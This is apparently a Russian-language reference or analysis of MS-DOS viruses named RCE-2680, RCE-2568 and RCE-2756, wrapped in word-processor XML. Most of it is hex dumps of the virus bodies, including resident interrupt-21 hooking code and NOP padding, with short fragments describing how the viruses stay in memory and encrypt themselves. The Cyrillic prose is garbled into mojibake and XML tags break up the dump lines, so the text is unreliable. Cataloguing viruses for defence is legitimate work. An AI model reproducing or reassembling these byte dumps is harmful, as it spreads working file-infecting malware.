24 4D 4F 52 45  .-- More --$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   3A 20 49 6E 63 6F 72 72 65 63 74 20 44 4F 53 20  : Incorrec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0   76 65 72 73 69 6F 6E 0D 0A 24 59 C3 00 00 00 00  version..$Y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0   F4 7A 2C 00 00 00 1A 01 BE 0A B4 30 CD 21 3D 03  .z,........0.!=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0   1E 74 09 BA FC 01 B4 09 CD 21 CD 20 C6 06 E5 01  .t.......!.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0   19 B4 0F CD 10 88 26 E6 01 BA 60 02 4C 1C 60 14  ......&amp;...`.L.`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0   26 02 56 05 EA 1F 53 FF 00 F0 05 00 01 00 21 10  &amp;.V...S.......!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0   DE 00 6A 00 EA 5B E0 00 F0 56 07 70 00 FF FF FF  ..j..[...V.p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0   FF FF 56 07 70 00 00 00 21 01 00 01 00 01 03 01  ..V.p...!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0   00 00 10 00 00 01 00 02 CF 02 C7 11 C7 11 E6 0F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0   28 0E C7 11 28 0E E6 0F C4 17 C7 11 C7 11 E6 0F  (...(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0   28 0E C7 11 C7 11 C7 11 C7 11 E6 0F 28 0E 59 0D  (...........(.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B0   28 0E E6 0F C7 11 EF 12 C4 17 2C 15 EF 12 C7 11  (.........,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C0   C7 11 2C 15 EF 12 2C 15 C5 1A 2C 15 EF 12 C7 11  ..,...,...,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D0   2C 15 C4 17 2C 15 C4 17 C5 1A 67 1C C5 1A C4 17  ,...,.....g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0   2C 15 EF 12 2C 15 C5 1A 2C 15 EF 12 C7 11 2C 15  ,...,...,.....,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F0   C4 17 C7 11 EF 12 E6 0F C7 11 C7 11 FF FF 05 05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0   05 05 05 05 05 05 05 05 05 05 09 09 05 05 05 05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0   05 05 05 05 05 05 05 05 09 09 05 05 05 05 05 05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0   05 05 05 05 05 05 05 05 06 05 05 05 05 05 05 05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0   06 05 05 05 05 09 09 FE 06 7A 7D FE 06 FB 7D 74  .........z}...}t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0   05 EA 00 7C 00 00 FC 33 C0 8E C0 BE 2A 7D BF 4C  ...|...3....*}.L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0   00 A5 A5 26 83 06 13 04 02 EA 00 7C 00 00 8B 04  ...&amp;.......|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0   2D BB 00 72 09 3D 08 00 90 72 03 89 04 C3 B8 09  -..r.=...r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70   00 EB F8 56 1E 51 1E 07 8E 1E 60 00 C5 37 26 89  ...V.Q....`..7&amp;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80   75 05 26 8C 5D 07 80 3C CF 74 12 FC B9 05 00 F3  u.&amp;.]..&lt;.t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90   A4 C6 44 FB 9A C7 44 FC C3 01 8C 4C FE 59 1F 5E  ..D...D....L.Y.^</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>03A0   C3 53 57 BB 04 00 BF 44 00 E8 C7 FF BB 0C 00 BF  .SW....D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B0   4D 00 E8 BE FF 5F 5B C3 51 57 C4 7C 05 26 80 3D  M...._[.QW.|.&amp;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C0   9A 75 0E 26 81 7D 01 C3 01 75 06 B9 05 00 FC F3  .u.&amp;.}...u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0CF0   52 34 BE 8C 21 29 B1 F9 C1 9B 12 04 09 F3 45 01  R4..!).......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D00   93 1D B0 B9 C6 01 06 92 37 50 49 E8 D5 71 97 22  ........7PI..q."</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>0D10   A6 E6 4C 50 BE 2A 23 BE 44 1D A1 A6 6B A0 E0 06  ..LP.*#.D...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D20   AA 1A F6 2A C0 02 2F 75 99 06 0F 5B 97 02 3E 64  ...*../u...[..&gt;d</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>0D30   7D C8 50 66 08 C4 FA 92 8E 64 75 1B A6 1B B9 32  }.Pf.....du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0D40   BD 0B 3E 61 6D E0 C4 B9 29 CA 9C 17 08 21 EA EE  ..&gt;am...)....!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D50   7E 85 B1 63 2A C3 71 71 2C A0 F2 8B 59 0D F9 D5  ~..c*.qq,...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D60   00�F4 7A 2C�00                                   ..z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ࠣ���� �����  ����� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>R�E-2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0   E9 0E 08 90 90 90 90 90 90 90 90 90 90 90 90 90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   90 90 04 00 90 90 90 90 90 90 90 90 90 90 90 90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0   90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90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0   90 90 90 90 90 90 90 90 90 90 90 C3 7A 3D 00 00  ............z=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0   F4 7A 2C 00 00 00 3C 00 BE 0A 90 90 90 90 90 90  .z,...&lt;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0   90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90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0   90 90 90 90 90 90 90 90 90 90 60 14 79 02 60 14  ..........`.y.`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0   79 02 56 05 8C 42 53 FF 00 F0 05 00 B6 64 3B 13  y.V..BS......d;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0   DE 00 6A 00 2E 83 3E D4 06 5C 07 70 00 2E 83 3E  ..j...&gt;..\.p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0   D4 06 5C 07 70 00 00 00 21 01 00 01 00 01 69 01  ..\.p...!.....i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0   00 00 10 00 00 01 00 02 CF 02 C7 11 C7 11 E6 0F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0   28 0E C7 11 28 0E E6 0F C4 17 C7 11 C7 11 E6 0F  (...(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C0   28 0E C7 11 C7 11 C7 11 C7 11 E6 0F 28 0E 59 0D  (...........(.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D0   28 0E E6 0F C7 11 EF 12 C4 17 2C 15 EF 12 C7 11  (.........,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E0   C7 11 2C 15 EF 12 2C 15 C5 1A 2C 15 EF 12 C7 11  ..,...,...,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0   2C 15 C4 17 2C 15 C4 17 C5 1A 67 1C C5 1A C4 17  ,...,.....g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   2C 15 EF 12 2C 15 C5 1A 2C 15 EF 12 C7 11 2C 15  ,...,...,.....,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0   C4 17 C7 11 EF 12 E6 0F C7 11 C7 11 FF FF 05 05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0   05 05 05 05 05 05 05 05 05 05 09 09 05 05 05 05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0   05 05 05 05 05 05 05 05 09 09 05 05 05 05 05 05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0   05 05 05 05 05 05 05 05 06 05 05 05 05 05 05 05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0   06 05 05 05 05 09 09 FE 06 7A 7D FE 06 FB 7D 74  .........z}...}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0   05 EA 00 7C 00 00 FC 33 C0 8E C0 BE 2A 7D BF 4C  ...|...3....*}.L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0   00 A5 A5 26 83 06 13 04 02 EA 00 7C 00 00 8B 04  ...&amp;.......|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0   2D BB 00 72 09 3D 08 00 90 72 03 89 04 C3 B8 09  -..r.=...r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0   00 EB F8 56 1E 51 1E 07 8E 1E 60 00 C5 37 26 89  ...V.Q....`..7&amp;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0   75 05 26 8C 5D 07 80 3C CF 74 12 FC B9 05 00 F3  u.&amp;.]..&lt;.t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B0   A4 C6 44 FB 9A C7 44 FC C3 01 8C 4C FE 59 1F 5E  ..D...D....L.Y.^</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>02C0   C3 53 57 BB 04 00 BF 44 00 E8 C7 FF BB 0C 00 BF  .SW....D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D0   4D 00 E8 BE FF 5F 5B C3 51 57 C4 7C 05 26 80 3D  M...._[.QW.|.&amp;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0   9A 75 0E 26 81 7D 01 C3 01 75 06 B9 05 00 FC F3  .u.&amp;.}...u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F0   A4 5F 59 C3 56 BE 4D 00 E8 DD FF BE 44 00 E8 D7  ._Y.V.M.....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                            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  ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>砫� ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⠫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1      E8 00 00 5B 81 EB D4 07 2E C6 87 5C 00 FF FC  ....[.......\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20   2E 80 BF 5B 00 00 74 18 BE 0A 00 03 F3 BF 00 01  ...[..t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30   B9 20 00 F3 A4 0E 2E FF B7 64 00 06 1E 50 EB 13  . .......d...P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...                         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B60   31 46 F8 26 A1 0A 00 31 46 FA 26 A1 0C 00 31 46  1F.&amp;...1F.&amp;...1F</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>0B70   FC 26 A1 0E 00 31 46 FE EB 11 8B C1 B9 08 00 8D  .&amp;...1F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B80   76 F0 33 FF F3 36 A5 8B C8 EB 03 49 EB 9B D1 EA  v.3..6.....I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B90   72 02 EB 86 8B E5 5D C3 55 8B EC 1E 8E 5E 04 8E  r.....].U....^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BA0   46 06 33 DB 26 8B 07 31 07 83 C3 02 83 FB 10 72  F.3.&amp;..1.......r</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>0BB0   F3 FF 46 04 FF 46 06 FF 4E 08 75 E0 1F 5D C3 55  ..F..F..N.u..].U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   8B EC 1E B3 01 33 F6 33 C9 8B 7E 08 03 7E 0A 4F  .....3.3..~..~.O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0   8E DF D0 2C D1 D1 4F 3B 7E 08 73 F4 0B C9 74 11  ...,..O;~.s..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BE0   51 FF 76 06 FF 76 04 E8 EB FE 83 C4 06 8E D8 30  Q.v..v.........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F0   1C 46 83 FE 10 72 D0 D0 E3 73 CA 1F 5D C3 87 DB  .F...r...s..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C00   88 CB 8A 99 8F 38 E7 CD A1 9B 3E EF 86 C8 97 83  .....8....&gt;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C10   52 34 BE 8C 21 29 B1 F9 C1 9B 12 04 09 F3 45 01  R4..!).......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C20   93 1D B0 B9 C6 01 06 92 37 50 49 E8 D5 71 97 22  ........7PI..q."</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>0C30   A6 E6 4C 50 BE 2A 23 BE 44 1D A1 A6 6B A0 E0 06  ..LP.*#.D...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   AA 1A F6 2A C0 02 2F 75 99 06 0F 5B 97 02 3E 64  ...*../u...[..&gt;d</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>0C50   7D C8 50 66 08 C4 FA 92 8E 64 75 1B A6 1B B9 32  }.Pf.....du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0C60   BD 0B 3E 61 6D E0 C4 B9 29 CA 9C 17 08 21 EA EE  ..&gt;am...)....!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C70   7E 85 B1 63 2A C3 71 71 2C A0 F2 8B 59 0D F9 D5  ~..c*.qq,...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C80   00�F4 7A 2C�00                                   ..z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3.2.   �⠬� RCE-2680 - ��-33 (21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⠬�,  ��-��������,  ���� ���� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>।�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⠢�⥫�� �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>. ������ � ��� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>뫠 ��������� ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᯥ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>稢���� ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⠭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ਣ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">쭮�� ���� ����� �� ��������� �� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>16 ��᫥����⥫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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">(� ������� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᠬ����४����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>饣��� ���� ��������</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>). ����� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠥ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㤫� � </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>17 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ࠣ���� ����� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⠬�� RCE-26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0   E9 9F 06 90 90 90 90 90 90 90 90 90 90 90 90 90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   90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90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0   90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90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0   90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 C3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0   4D 08 00 AF 00 00 00 00 00 00 00 00 00 00 00 00  M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0   60 02 FD 16 60 14 74 02 56 05 63 13 53 FF 00 F0  `...`.t.V.c.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0   20 00 05 00 BB 91 6A 13 00 00 C6 00 52 00 2E C6   .....j.....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0   5C 07 70 00 55 8B 5C 07 70 00 01 00 01 90 90 90  \.p.U.\.p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0   90 90 90 90 90 90 90 90 90 90 90 87 DB 87 DB 90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0   64 02 C7 11 C7 11 E6 0F 28 0E C7 11 28 0E E6 0F  d.......(...(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0   C4 17 C7 11 C7 11 E6 0F 28 0E C7 11 C7 11 C7 11  ........(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0   C7 11 E6 0F 28 0E 59 0D 28 0E E6 0F C7 11 EF 12  ....(.Y.(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C0   C4 17 2C 15 EF 12 C7 11 C7 11 2C 15 EF 12 2C 15  ..,.......,...,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D0   C5 1A 2C 15 EF 12 C7 11 2C 15 C4 17 2C 15 C4 17  ..,.....,...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E0   C5 1A 67 1C C5 1A C4 17 2C 15 EF 12 2C 15 C5 1A  ..g.....,...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0   2C 15 EF 12 C7 11 2C 15 C4 17 C7 11 EF 12 E6 0F  ,.....,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   C7 11 C7 11 FF FF 05 05 05 05 05 05 05 05 05 05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0   05 05 09 09 05 05 05 05 05 05 05 05 05 05 05 05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0   09 09 05 05 05 05 05 05 05 05 05 05 05 05 05 05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0   06 05 05 05 05 05 05 05 06 05 05 05 05 09 09 50  ...............P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0   53 B8 00 00 8E C0 26 C4 1C 89 5D 02 8C 45 04 26  S.....&amp;...]..E.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0   80 3F CF 74 0A 26 8B 07 89 05 26 C7 07 CD 1C 5B  .?.t.&amp;....&amp;....[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0   58 C3 56 57 BE 04 00 BF 2E 00 E8 D2 FF BE 0C 00  X.VW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0   BF 34 00 E8 C9 FF 5F 5E C3 53 8B 5D 02 83 C3 02  .4...._^.S.]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0   39 5E 02 74 08 8B 5D 04 39 5E 04 75 01 40 C4 5D  9^.t..].9^.u.@.]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0   02 26 81 3F CD 1C 75 05 8B 3D 26 89 3F 5B C3 50  .&amp;.?..u..=&amp;.?[.P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0   57 33 C0 BF 34 00 E8 D0 FF BF 2E 00 E8 CA FF 0B  W3..4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B0   C0 5F 58 C3 8C C8 39 46 0A 74 2D 8E 5E 0A 80 BF  ._X...9F.t-.^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C0   76 0A 21 75 18 81 BF 74 0A F4 7A 75 10 8C D8 D1  v.!u...t..zu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D0   EB D1 EB D1 EB D1 EB 03 C3 8E D8 EB 0B 83 6E 02  ..............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0   02 07 1F 5B 58 9D 5D CF E8 F7 00 8B 46 0C FE 06  ...[X.].....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F0   3B 00 A9 00 01 75 07 FF 4E 08 FE 0E 3B 00 25 FF  ;....u..N...;.%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                            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  ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>砫� ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⠫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07A2         E8 00 00 5B 81 EB 65 06 50 53 BB 21 00 F8  C....[..e.PS.!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B0   B8 03 C5 CD 21 5B 72 23 83 FC F0 72 1E 2E 8B 97  ....![r#...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C0   03 00 42 8C D9 03 D1 8E C2 8B F3 8B FE B9 78 0A  ..B..........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...                         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90   26 A3 06 00 8B 46 F8 26 A3 08 00 8B 46 FA 26 A3  &amp;....F.&amp;....F.&amp;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A0   0A 00 8B 46 FC 26 A3 0C 00 8B 46 FE 26 A3 0E 00  ...F.&amp;....F.&amp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B0   EB 05 90 49 E9 6C FF D1 EA 72 03 E9 3A FF 8B E5  ...I.l...r..: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C0   5D C3 55 8B EC 1E 8E 5E 04 8E 46 06 BB 00 00 26  ].U....^..F....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0AD0   8B 07 31 07 83 C3 02 83 FB 10 72 F3 FF 46 04 FF  ..1.......r..F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E0   46 06 FF 4E 08 75 DF 1F 5D C3 55 8B EC 1E B3 01  F..N.u..].U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F0   33 F6 33 C9 8B 7E 08 03 7E 0A 4F 8E DF D0 2C D1  3.3..~..~.O...,.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>0B00   D1 4F 3B 7E 08 73 F4 0B C9 74 11 51 FF 76 06 FF  .O;~.s...t.Q.v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B10   76 04 E8 9D FE 83 C4 06 8E D8 30 1C 46 83 FE 10  v.........0.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0   72 D0 D0 E3 73 CA 1F 5D C3 87 DB 87 DB 87 DB 90  r...s..]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B30   5C 8B D5 0C D8 19 1C 28 7A 2F E5 E9 8D 4F 5E ED  \......(z/...O^.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>0B40   68 68 2E E4 3D 13 4F 08 7A 26 32 BF 37 57 A6 6C  hh..=.O.z&amp;2.7W.l</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>0B50   A8 CD C8 BE 76 35 B4 0D 2C 5D 0E F2 2C 83 BF 3F  ....v5..,]..,..?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>0B60   05 08 B5 5C 56 C4 08 0F C2 7F 0C B4 9E 94 3A 3F  ...\V........:?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>0B70   32 0D 73 33 D9 64 88 C8 B8 C4 B7 F5 47 2B 41 89  2.s3.d......G+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B80   C1 3E 0F 67 AA E7 F4 92 89 4E 96 C7 AF 80 5C AA  .&gt;.g.....N....\.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>0B90   43 90 CF D2 EF 3B 32 E9 5F 39 3E 67 4E 4B 47 1B  C....;2._9&gt;gNK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BA0   D2 2B 7A 58 EC 6C 90 D9 E6 0A 21 B5 0D 5F B4 46  .+zX.l....!.._.F</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>0BB0   40 00 93 91�F4 7A 21�90                          @....z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3.3.  �⠬� RCE-2568 - ��-34 (22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ࠣ���� ����� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⠬�� RCE-2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0   E9 8F 06 90 90 90 90 90 90 90 90 90 90 90 90 90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   90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90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0   90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90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0   90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 C3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0   60 02 FD 16 60 14 74 02 56 05 23 3C 53 FF 00 F0  `...`.t.V.#&lt;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0   20 00 05 00 93 91 6A 13 00 00 B6 00 42 00 2E A3   .....j.....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0   5C 07 70 00 87 EC 5C 07 70 00 01 00 01 90 90 90  \.p...\.p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0   90 90 90 90 90 90 90 90 90 90 90 87 DB 87 DB 90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0   54 02 C7 11 C7 11 E6 0F 28 0E C7 11 28 0E E6 0F  T.......(...(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0   C4 17 C7 11 C7 11 E6 0F 28 0E C7 11 C7 11 C7 11  ........(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0   C7 11 E6 0F 28 0E 59 0D 28 0E E6 0F C7 11 EF 12  ....(.Y.(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0   C4 17 2C 15 EF 12 C7 11 C7 11 2C 15 EF 12 2C 15  ..,.......,...,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C0   C5 1A 2C 15 EF 12 C7 11 2C 15 C4 17 2C 15 C4 17  ..,.....,...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D0   C5 1A 67 1C C5 1A C4 17 2C 15 EF 12 2C 15 C5 1A  ..g.....,...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E0   2C 15 EF 12 C7 11 2C 15 C4 17 C7 11 EF 12 E6 0F  ,.....,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0   C7 11 C7 11 FF FF 05 05 05 05 05 05 05 05 05 05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   05 05 09 09 05 05 05 05 05 05 05 05 05 05 05 05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0   09 09 05 05 05 05 05 05 05 05 05 05 05 05 05 05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0   06 05 05 05 05 05 05 05 06 05 05 05 05 09 09 50  ...............P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0   53 B8 00 00 8E C0 26 C4 1C 89 5D 02 8C 45 04 26  S.....&amp;...]..E.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0   80 3F CF 74 0A 26 8B 07 89 05 26 C7 07 CD 1C 5B  .?.t.&amp;....&amp;....[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0   58 C3 56 57 BE 04 00 BF 1E 00 E8 D2 FF BE 0C 00  X.VW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0   BF 24 00 E8 C9 FF 5F 5E C3 53 8B 5D 02 83 C3 02  .$...._^.S.]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0   39 5E 02 74 08 8B 5D 04 39 5E 04 75 01 40 C4 5D  9^.t..].9^.u.@.]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0   02 26 81 3F CD 1C 75 05 8B 3D 26 89 3F 5B C3 50  .&amp;.?..u..=&amp;.?[.P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0   57 33 C0 BF 24 00 E8 D0 FF BF 1E 00 E8 CA FF 0B  W3..$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0   C0 5F 58 C3 8C C8 39 46 0A 74 2D 8E 5E 0A 80 BF  ._X...9F.t-.^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B0   06 0A 22 75 18 81 BF 04 0A F4 7A 75 10 8C D8 D1  .."u......zu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C0   EB D1 EB D1 EB D1 EB 03 C3 8E D8 EB 0B 83 6E 02  ..............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D0   02 07 1F 5B 58 9D 5D CF E8 F7 00 8B 46 0C FE 06  ...[X.].....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0   2B 00 A9 00 01 75 07 FF 4E 08 FE 0E 2B 00 25 FF  +....u..N...+.%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F0   FE 89 46 0C E8 5B FF 07 1F 5B 58 9D 5D 83 C4 06  ..F..[...[X.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                            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  ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>砫� ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⠫���� �����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0792         E8 00 00 5B 81 EB 55 06 50 53 BB 22 00 F8  C....[..U.PS."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A0   B8 03 C5 CD 21 5B 72 03 E9 AE 00 59 8C C8 8E D8  ....![r....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B0   8E C0 2E 8A 87 07 0A 2E A2 00 01 8B C1 8B 8F 02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...                         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20   00 8B 46 F8 26 A3 08 00 8B 46 FA 26 A3 0A 00 8B  ..F.&amp;....F.&amp;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30   46 FC 26 A3 0C 00 8B 46 FE 26 A3 0E 00 EB 05 90  F.&amp;....F.&amp;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40   49 E9 6C FF D1 EA 72 03 E9 3A FF 8B E5 5D C3 55  I.l...r..:...].U</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>0A50   8B EC 1E 8E 5E 04 8E 46 06 BB 00 00 26 8B 07 31  ....^..F....&amp;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0A60   07 83 C3 02 83 FB 10 72 F3 FF 46 04 FF 46 06 FF  .......r..F..F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70   4E 08 75 DF 1F 5D C3 55 8B EC 1E B3 01 33 F6 33  N.u..].U....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0A80   C9 8B 7E 08 03 7E 0A 4F 8E DF D0 2C D1 D1 4F 3B  ..~..~.O...,..O;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>0A90   7E 08 73 F4 0B C9 74 11 51 FF 76 06 FF 76 04 E8  ~.s...t.Q.v..v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A0   9D FE 83 C4 06 8E D8 30 1C 46 83 FE 10 72 D0 D0  .......0.F...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B0   E3 73 CA 1F 5D C3 87 DB 87 DB 87 DB 87 DB 87 DB  .s..]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C0   68 1A B2 D1 4F C2 77 7C B1 40 9A F7 09 45 C1 29  h...O.w|.@...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0AD0   9A 70 13 73 E6 9D 74 E6 8A 0C FA 4B 55 AB 04 85  .p.s..t....K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E0   3E 53 78 2E 3E CD 0E D2 E1 D1 DA 68 93 EF 06 E0  &gt;Sx.&gt;......h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F0   B7 C5 96 1A A5 A8 78 68 F4 41 1F 70 9A 6E 58 DE  ......xh.A.p.nX.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>0B00   FD BA CD 64 00 46 6F 1B 94 88 E6 12 AF B1 F8 95  ...d.Fo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B10   46 A9 D1 AE 67 57 42 D9 6A 5B 8E 0E 1F 21 D5 0A  F...gWB.j[...!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0   4F FC 42 7B 17 B1 F9 F2 68 45 32 D0 6E F9 DD A4  O.B{....hE2.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B30   DC 01 4D 1A FC 65 51 25 DD 88 25 61 02 BD 0D 0C  ..M..eQ%..%a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B40   40 00 93 91�F4 7A 22�90                          @....z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3.4. �⠬� RCE-2756 - ��-38 (26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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⠬�� ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>஬ �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>뫠 ��������� ������</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᯥ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>稢���� ��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䨫��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>஢</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">墠�뢠���  ���뢠��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>21.  �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ਬ������ �ਥ� �᭮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���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>஢�� �ணࠬ�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, "</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᨤ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>" �� 21 ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>뢠��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"�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ਣ������</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>" ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠡ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">稪 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">MS DOS � ����������� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᮮ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⢥�����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>饣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� ⮣�  ������ � �⮩ ���ᨨ �������� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">䥪� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᠬ�����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>祭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� �ணࠬ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
